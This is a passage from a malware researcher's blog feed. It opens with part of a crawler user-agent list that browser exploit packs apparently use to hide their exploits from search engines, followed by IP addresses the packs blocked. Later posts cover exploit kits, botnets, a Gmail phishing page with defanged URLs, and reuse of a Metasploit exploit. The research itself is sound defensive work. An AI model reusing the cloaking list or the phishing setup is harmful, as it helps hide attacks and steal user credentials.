Yandex
Yanga
Yeti
msnbot
spider
yahoo
jeeves
google
altavista
scooter
av\s*fetch
asterias
spiderthread revision
sqworm
ask
lycos.spider
infoseek sidewinder
ultraseek
polybot
webcrawler
robozill
gulliver
architextspider
yahoo!\s*slurp
charlotte
ngb
</code></pre>
<div>
<b><br /></b></div>
A number of IP addresses with respective user-agent strings are presented below that were not allowed to load BEP URL in the browser for exploitation.<br />
<br />
<pre style="background-image: URL(http://2.bp.blogspot.com/_z5ltvMQPaa8/SjJXr_U2YBI/AAAAAAAAAAM/46OqEP32CJ8/s320/codebg.gif); background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> 77.120.162.20|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
194.124.140.39|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
41.249.252.199|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
46.126.65.93|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
213.14.101.210|Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
93.199.31.78|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; tb-webde/2.6.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
188.63.105.11|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
77.56.219.66|Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
84.253.30.110|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
194.179.92.135|Mozilla/4.0 (compatible;)
189.19.165.228|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
66.102.6.183|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.68 Safari/537.36
66.249.93.223|Mozilla/5.0 (en-us) AppleWebKit/534.14 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/9.0.597 Safari/534.14
81.62.35.97|Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
195.78.246.18|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
</code></pre>
<br />
Inference: <b>BEPs extensively use IPLDT to manage the infections and make the malicious code to be served to dedicated countries.</b><br />
<br />Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-79632620774436675722015-02-08T10:54:00.000-08:002015-02-08T10:54:54.297-08:00Virus Bulletin Paper - Prosecting the Citadel botnet !Virus Bulletin published earlier our research on Citadel. Check the links:<br />
<ul>
<li>Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part one : <a href="https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1"><b>https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1</b></a> </li>
<li>Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part two : <b><a href="https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2">https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2</a> </b></li>
</ul>
<br />
Full PDF paper : <a href="https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf"><b>https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf</b></a>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-68538390443924825412014-08-24T08:41:00.001-07:002014-08-24T08:42:15.910-07:00BlackHat 2014 - Botnet C&C Panel TalkWhitepaper: <b><a href="http://secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf">http://secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf</a></b> <br><br>
<center><iframe src="//www.slideshare.net/slideshow/embed_code/37829873" width="427" height="356" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen> </iframe> </center>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-83971907364709744182014-04-15T21:24:00.002-07:002014-06-11T22:29:03.002-07:00Targeted Cyber Attacks Book - Syngress !<div class="separator" style="clear: both; text-align: left;">
<b>Update: A very insightful review of the book published in Network Security.</b></div>
<br />
<iframe allowfullscreen="" frameborder="0" height="511" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/35777411" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px; max-width: 100%;" width="479"> </iframe> <br />
<div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/adityaks/network-security-book-review-targeted" target="_blank" title="Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood">Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood</a> </strong></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-9qVr5G7PmSU/U04ARXTY5UI/AAAAAAAABso/Yw5tq6I3FQA/s1600/book_cover.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-9qVr5G7PmSU/U04ARXTY5UI/AAAAAAAABso/Yw5tq6I3FQA/s1600/book_cover.png" height="200" width="136" /></a></div>
I started sketching this book about a year ago when I was invited by Syngress for this project based on my previous work on crimeware research. Thanks to the Syngress and Elsevier team for this step. Due to my ongoing job and commitments, the project got delayed but eventually the book is about to be published on 18th April. The first edition of the book is dedicated to the readers who are interested in understanding the artifacts of targeted cyber-attacks and associated components. Personally, I would like to thank all the researchers and journalists who reviewed the book and provided positive feedback.<br />
<b><br /></b>
<b>Introduction</b>: Cyber-crime increasingly impacts both the online and offline world, and targeted attacks play a significant role in disrupting services in both. Targeted attacks are those that are aimed at a particular individual, group, or type of site or service. Unlike worms and viruses that usually attack indiscriminately, targeted attacks involve intelligence-gathering and planning to a degree that drastically changes its profile.<br />
Individuals, corporations, and even governments are facing new threats from targeted attacks. Targeted Cyber Attacks examines real-world examples of directed attacks and provides insight into what techniques and resources are used to stage these attacks so that you can counter them more effectively.<br />
<br />
The book is available to be ordered at following places:<br />
<ul>
<li><b>Amazon:<a href="http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048" target="_blank"> http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048</a></b></li>
<li><b>Kindle Edition: <a href="http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY" target="_blank">http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY</a></b></li>
<li><b>Elsevier: <a href="http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/">http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/</a></b></li>
<li><b>Barnes and Noble: <a href="http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047">http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047</a></b></li>
</ul>
<b>Note:</b> Elsevier Store will offer electronic versions that are readable on Kindles in PDF and MOBI format.<br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-2720273338377073352014-02-27T17:12:00.001-08:002014-03-05T07:47:52.620-08:00Gmail Phishing Attack - Why the Anti-spam Solutions Fail to Trigger ?<div class="separator" style="clear: both; text-align: left;">
<b>Update: 5th March, 2014</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note: I am concerned because it got delivered to my personal gmail inbox -:)</b></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It looks like the phishing attack discussed earlier (a week ago) on gmail users is still underway. Although, the attack is public now, the endpoint security solutions deployed by Google still fails to mark the emails as phished. The latest snapshot of this attack is presented below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Links: </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><b>hxxp://croydon.com.br/phpthumb/serv/serv/Login.htm </b></li>
<li><b>hxxp://croydon.com.br/phpthumb/serv/serv/badu.php</b></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-QEXpo0qw0P8/UxdC9RHeYyI/AAAAAAAABqk/dn3ExaD0QUc/s1600/gmail_phishin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-QEXpo0qw0P8/UxdC9RHeYyI/AAAAAAAABqk/dn3ExaD0QUc/s1600/gmail_phishin.png" height="362" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The host has a malice history though : <a href="https://www.virustotal.com/en/ip-address/187.17.98.129/information/" target="_blank"><b>https://www.virustotal.com/en/ip-address/187.17.98.129/information/</b></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
It is not a reliable way to depend heavily on safe-browsing all the time for blacklisting the phishing websites rather the prevention has to be triggered at the time of origin. Let's see how long this continues. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
-------------------------------</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A recent targeted phishing attack has been launched against gmail.com users. Interestingly, the email slipped through Google end point security solution which fails to detect the spam email and served it properly to the user's inbox.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XYfapbkFAeY/Uw_XdilOxcI/AAAAAAAABp0/6e8giBH5aX8/s1600/gmail_attack_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-XYfapbkFAeY/Uw_XdilOxcI/AAAAAAAABp0/6e8giBH5aX8/s1600/gmail_attack_1.png" height="128" width="640" /></a></div>
<br />
<div>
Visiting the link results in the following webpage showing the same layout as of Gmail. </div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-XGWYbMZMqIs/Uw_YikSBLpI/AAAAAAAABp8/TjgZUvQaITM/s1600/gmail_attack_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-XGWYbMZMqIs/Uw_YikSBLpI/AAAAAAAABp8/TjgZUvQaITM/s1600/gmail_attack_2.png" height="430" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Malicious Check: </div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>The domain resolves to an IP address which has a history of being potential malice: <a href="https://www.virustotal.com/en/ip-address/79.170.44.127/information/">https://www.virustotal.com/en/ip-address/79.170.44.127/information/</a>. The virtual hosting server has been used for compromised WordPress websites.</li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
Overall, basic steps:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ol>
<li>The user is redirected and served with a gmail.com webpage here: <b>hxxp://www.nusurgix.com/virtusite/phpthumb/serv/Login.htm</b></li>
<li>The form submission sends all the POST data to: <b>hxxp://www.nusurgix.com/virtusite/phpthumb/serv/badu.php</b></li>
<li>The user redirects successfully to legitimate gmail.com webpage: h<b>xxps://accounts.google.com/</b></li>
</ol>
<br />
<div class="separator" style="clear: both; text-align: left;">
The website is hosted on a CMS hosting server as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GHaCEwK7h6A/Uw_ZNrppjXI/AAAAAAAABqE/kvPsuSDEB-w/s1600/gmail_attack_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-GHaCEwK7h6A/Uw_ZNrppjXI/AAAAAAAABqE/kvPsuSDEB-w/s1600/gmail_attack_3.png" height="384" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
Overall, it might not be that sophisticated attack, but a few inferences:</div>
<div>
<ul>
<li>Smart user would have detected that this is a trick even it is delivered to inbox.</li>
<li><b>Big issue, the anti-spam solutions in Google's network fails to detect it and mark it as phished. </b></li>
<li>There might be a possibility that a few users would have fallen to this trick but we cannot be sure.</li>
<li>The attacker used a compromised network infrastructure to execute this attack. A healthcare provider hosting account is compromised.</li>
<li>This type of attack if remains active for only few minutes could have already garnered a good set of accounts.</li>
</ul>
<div>
Do not fall for this trap !</div>
</div>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-27259303621089490162014-01-12T17:18:00.001-08:002014-01-12T17:18:18.722-08:00Virus Bulletin - NiFramer Iframer Injector - CPanelA couple of months earlier, we released a paper on the design of NiFramer, a bash tool to automate the Iframe injections on the compromised servers. It has been used widely by attackers. However, in coming time, we will be covering different variants of automated Iframe injection tools.<br />
<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="511" marginheight="0" marginwidth="0" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/29940066" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" width="479"> </iframe> <br />
<div style="margin-bottom: 5px;">
</div>
</center>
<center style="text-align: left;">
You can download the paper at: <a href="http://secniche.org/released/VB_CPANEL_IFRAME_INJECT.pdf" target="_blank"><b>http://secniche.org/released/VB_CPANEL_IFRAME_INJECT.pdf</b></a></center>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-18900959151622367842013-11-05T19:32:00.001-08:002013-11-05T19:32:38.739-08:00Virus Bulletin : Analysis of Styx Exploit Pack <div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-gziGn9kh7sE/Unm4CGFCQKI/AAAAAAAABmM/E5g3New08YQ/s1600/ferryman_on_river_styx_by_skeletalcloset-d3j1xpq.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-gziGn9kh7sE/Unm4CGFCQKI/AAAAAAAABmM/E5g3New08YQ/s200/ferryman_on_river_styx_by_skeletalcloset-d3j1xpq.jpg" width="160" /></a></div>
We released a paper in Virus Bulletin Magazine on the design analysis of Styx exploit pack.<br />
<br />
" In this paper, we discuss the details and design of the Styx exploit pack. According to the dictionary, Styx is a river in the underworld, over which Charon ferried the souls of the dead. According to the Styx service provider website, ‘Styx is a river in Greek mythology that formed the boundary between earth and the underworld... It circles the underworld nine times.’ So it seems that the origin of the name is as rigorous as the exploit pack itself."<br />
<br />
Download the paper from here:<b> <a href="http://secniche.org/released/VB_Styx_Exploit_Pack.pdf">http://secniche.org/released/VB_Styx_Exploit_Pack.pdf</a></b><br />
<br />Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-88266939480161867672013-09-13T13:53:00.002-07:002013-09-13T13:55:24.218-07:00CrossTalk Paper - The Art of Cyber Bank Robbery !<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-0-Cover-200.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-0-Cover-200.jpg" width="156" /></a></div>
We released a new paper to provide insights into Cyber bank robbery model opted by cyber criminals.
<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="511" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/26178793" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="479"> </iframe> <div style="margin-bottom: 5px;">
<strong> <a href="https://www.slideshare.net/adityaks/crosstalk" target="_blank" title="CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insidious Attacks !">CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insidious Attacks !</a> </strong> </div>
</center>
<br />
Download paper : <a href="http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-Sood.pdf">http://www.crosstalkonline.org/storage/issue-archives/2013/201309/201309-Sood.pdf</a>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-33027963768748858672013-06-10T16:58:00.001-07:002013-06-10T17:05:15.890-07:00ToorCon 14 Slides : Malandroid : The Crux of Android InfectionsJust uploaded the deck of slides used in ha talk that I presented at <b>ToorCon 14 Security conference</b> in San Diego.<br />
<br />
<center>
<iframe allowfullscreen="" frameborder="0" height="356" marginheight="0" marginwidth="0" mozallowfullscreen="" scrolling="no" src="http://www.slideshare.net/slideshow/embed_code/22770073" style="border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;" webkitallowfullscreen="" width="427"> </iframe> <div style="margin-bottom: 5px;">
<strong> <a href="http://www.slideshare.net/adityaks/android-malware-presoversion02" target="_blank" title="ToorCon 14 : Malandroid : The Crux of Android Infections">ToorCon 14 : Malandroid : The Crux of Android Infections</a> </strong><br />
<br />
<div style="text-align: left;">
Abstract: The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-GLC5ytsm_IM/UbZpIUcikCI/AAAAAAAABds/6ORUcpGhoqU/s1600/tc14badge.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-GLC5ytsm_IM/UbZpIUcikCI/AAAAAAAABds/6ORUcpGhoqU/s320/tc14badge.jpeg" width="240" /></a></div>
Enjoy !</div>
</div>
</center>
Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-8748710435737068202013-05-20T03:57:00.000-07:002013-06-10T16:41:19.222-07:00Contrarisk Security Podcast: A look into Socioware !<div class="separator" style="clear: both; text-align: center;">
</div>
I recently did a podcast on the Socioware with Steve from Contrarisk.<br />
<br />
"Microsoft recently warned about Man in the Browser (MitB) malware exploiting Facebook sessions. When a user is infected – often by drive-by downloads on infected or malicious sites – the malware uses authenticated sessions on Facebook to post messages, ‘like’ pages and get up to general mischief."<br />
<br />
Listen to the podcast here: <a href="http://contrarisk.com/2013/05/19/csp-0011/"><b>http://contrarisk.com/2013/05/19/csp-0011/</b></a>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-86833580745140229512013-03-26T20:13:00.001-07:002013-04-01T16:35:38.180-07:00Malware Retrospective - Infected Chinese Servers Deploy Metasploit Exploits<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-LtDqp1Ldudg/TcGR4TDXYnI/AAAAAAAAFtc/5BwArQ9VW2Y/s400/Metasploit+Framework+3.7.0+Released+Download+Free+Metasploit+Latest+Version.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://4.bp.blogspot.com/-LtDqp1Ldudg/TcGR4TDXYnI/AAAAAAAAFtc/5BwArQ9VW2Y/s200/Metasploit+Framework+3.7.0+Released+Download+Free+Metasploit+Latest+Version.jpg" width="166" /></a></div>
It's been a time that our team blogged about malware and other interesting information. Today, we got some time to talk about one of the case that we analyzed while testing a few tools of our own. We prefer to construct custom scripts and tools to automate the process of web malware analysis. Recently, we tested our tool, a simple parser which fetches the scripts, iframes, embed tags present in the remote web pages for faster analysis. We came across a set of malicious domains that were serving an exploit which used JavaScript heap spraying technique to execute payload using drive-by download attack. Well, that's a common technique of silent browser exploitation. But, what was not common is the issue that is discussed below.<br />
<br />
The malware domain was hosting an exploit for MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption. More details can be read here: <b><a href="http://support.microsoft.com/kb/2722479" target="_blank">MS12-043</a>. </b>Without any surprise, the IP address of that domain belonged to China as shown below:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="http://3.bp.blogspot.com/-7GU_ce1doY0/UUferJ0jveI/AAAAAAAABak/JTYnHwbY_vI/s1600/china_ip_1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="http://3.bp.blogspot.com/-7GU_ce1doY0/UUferJ0jveI/AAAAAAAABak/JTYnHwbY_vI/s640/china_ip_1.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: left;"><br /></td></tr>
</tbody></table>
Our surprise did not end here. As the exploit of this vulnerability was released last year, it raised our interest to check how the exploit code is structured. When the exploit code was traced, it was nothing more than a sweet shock. The Chinese domain used the same exploit code hosted on the Metasploit repository for the concerned vulnerability. Now the question: Is it possible that Chinese malware authors simply deploy Metasploit exploits for easy infection process? It could be. Who knows whether the domain was infected by Chinese or it belonged to others. In addition, it is hard to say who hosted that malware but clearly, the servers were present in China.<br />
<br />
The exploit for this vulnerability can be found in Metasploit here: <b><a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb" target="_blank">https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb</a>.</b><br />
<b><br /></b>
A simple check on the one of the code snippet used in the malware domain and legitimate Metasploit repository is shown below:<br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LFIBGivEKMk/UUfmAB2LqmI/AAAAAAAABas/4CA33VuCm_A/s1600/china_exp_meta.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="260" src="http://1.bp.blogspot.com/-LFIBGivEKMk/UUfmAB2LqmI/AAAAAAAABas/4CA33VuCm_A/s640/china_exp_meta.png" width="640" /></a></div>
<b> </b><br />
<br />
The exploit code was used in conjunction with the JS code hosted here: <a href="http://js.users.51.la/15240615.js">http://js.users.51.la/15240615.js</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Lu-sScXAUWQ/UUfpSCrf8hI/AAAAAAAABa0/M6Dq7Wm9bkE/s1600/china_exp_meta_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="http://3.bp.blogspot.com/-Lu-sScXAUWQ/UUfpSCrf8hI/AAAAAAAABa0/M6Dq7Wm9bkE/s640/china_exp_meta_1.png" width="640" /></a></div>
<br />
<br />
This code dynamically generates the information about the visitor and creates log details for statistical purposes.<br />
<br />
We remember that a few traces have been detected earlier where Phoenix exploit kit used the one of the same exploit present in the Metasploit. Refer: <b><a href="http://a%20few%20traces%20have%20been%20detected%20earlier%20where%20phoenix%20exploit%20kit%20used%20the%20one%20of%20%20the%20same%20exploit%20present%20in%20the%20metasploit.%20but%2C%20that%20was%20a%20russian%20malware./" target="_blank">Gangsterware</a>. </b><br />
<br />
The conclusive points are:<br />
<br />
<ul>
<li>Metasploit provides neat exploits which are easy to deploy and use.</li>
<li>The evidence shows that malware authors are using Metasploit exploits.</li>
</ul>
<br />
Well, Reality bites !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-3137812299142141862013-03-05T08:28:00.000-08:002013-03-05T08:28:43.619-08:00VB Magazine - A Look into Sweet Orange and Propack Exploit Pack<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.virusbtn.com/images/structure/logo.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://www.virusbtn.com/images/structure/logo.gif" /></a></div>
We have just released our thoughts on "Sweet Orange" and "ProPack" exploit packs in VB magazine this month.<br />
<br />
"Blackhole has been the major player in the exploit kit market for a while now, but the Sweet Orange and ProPack kits have recently entered the market and are rapidly gaining in popularity. Aditya Sood and colleagues take a look at advancements in the design of the new kits on the block."<br />
<br />
Refer: <b><a href="http://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack" target="_blank">http://www.virusbtn.com/virusbulletin/archive/2013/03/vb201303-SweetOrange-ProPack</a></b><br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-12102587923292163322013-02-13T10:09:00.001-08:002013-02-13T10:12:39.290-08:00IEEE Security and Privacy Magazine - Targeted Cyber Attacks Paper<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.computer.org/portal/image/image_gallery?uuid=2e88a1f7-5a05-4cfd-8810-f221e62ce6a9&groupId=889144&t=1360263385342" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="http://www.computer.org/portal/image/image_gallery?uuid=2e88a1f7-5a05-4cfd-8810-f221e62ce6a9&groupId=889144&t=1360263385342" width="146" /></a></div>
<br />
Our paper on targeted attacks is out in IEEE Security and Privacy Magazine.<br />
<br />
"Targeted cyber attacks play an increasingly significant role in disrupting the online social and economic model, not to mention the threat they pose to nation-states. A variety of components and techniques come together to bring about such attacks"<br />
<br />
Refer here: <a href="http://www.computer.org/csdl/mags/sp/2013/01/msp2013010054-abs.html">http://www.computer.org/csdl/mags/sp/2013/01/msp2013010054-abs.html</a><br />
<br />
Enjoy !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-77059322474796366012013-02-06T20:43:00.000-08:002013-02-06T20:48:20.181-08:00Elsevier IJCIP - Crimeware-as-a-service – A survey of commoditized crimeware in the underground market<div class="separator" style="clear: both; text-align: center;">
<a href="http://ars.els-cdn.com/content/image/S18745482.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://ars.els-cdn.com/content/image/S18745482.gif" /></a></div>
Our paper on Crimeware-as-a-Service (CaaS) has been accepted for publication in Elsevier's Journal of Critical Infrastructure Protection and is available at <b><a href="http://www.sciencedirect.com/science/article/pii/S1874548213000036" target="_blank">http://www.sciencedirect.com/science/article/pii/S1874548213000036</a>.</b><br />
<b><br /></b>
<b>Abstract: </b>Crimeware-as-a-Service (CaaS) has become a prominent component of the underground economy. CaaS provides a new dimension to cyber crime by making it more organized, automated, and accessible to criminals with limited technical skills. This paper dissects CaaS and explains the essence of the underground economy that has grown around it. The paper also describes the various crimeware services that are provided in the underground market.Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-14362019466781275102013-01-30T08:53:00.002-08:002013-01-30T08:57:51.221-08:00IEEE Internet Computing - Dissecting the State of Underground Enterprise<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-VmcikH1jC20/UQlNXPWGGhI/AAAAAAAABZo/5WTyD1p4YJU/s1600/ieee_ic.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-VmcikH1jC20/UQlNXPWGGhI/AAAAAAAABZo/5WTyD1p4YJU/s1600/ieee_ic.png" /></a></div>
Our paper on "Dissecting the State of Underground Enterprise" is finally out in IEEE Internet Computing.<br />
<br />
<span style="font-family: 'Times New Roman', serif; font-size: 12pt; line-height: 115%;">Abstract: "Cybercrime's tentacles reach deeply
into the Internet. A complete, underground criminal economy has developed that
lets malicious actors steal money through the Web. The authors detail this
enterprise, showing how information, expertise, and money flow through it.
